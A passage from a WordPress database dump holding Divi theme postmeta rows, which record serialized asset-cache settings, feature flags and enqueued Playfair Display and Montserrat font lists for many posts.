;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32459,769,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32460,769,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32461,769,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32455,962,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32456,962,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32457,962,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32451,853,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32452,853,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32453,853,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32454,853,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32447,1048,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32448,1048,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32449,1048,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32450,1048,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32446,690,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32443,690,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32444,690,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32445,690,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32438,860,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32439,1023,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32440,1023,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32441,1023,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32442,1023,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32434,1348,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32435,860,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32436,860,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32437,860,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32430,1548,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32431,1348,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32432,1348,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32433,1348,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32418,1378,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32419,1563,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32420,1563,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32421,1563,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32422,1563,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32423,1267,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32424,1267,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32425,1267,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32426,1267,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32427,1548,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32428,1548,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32429,1548,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32416,1378,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32417,1378,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32413,814,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32414,814,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32415,1378,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32411,814,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32412,814,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32408,530,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32409,530,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32410,530,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic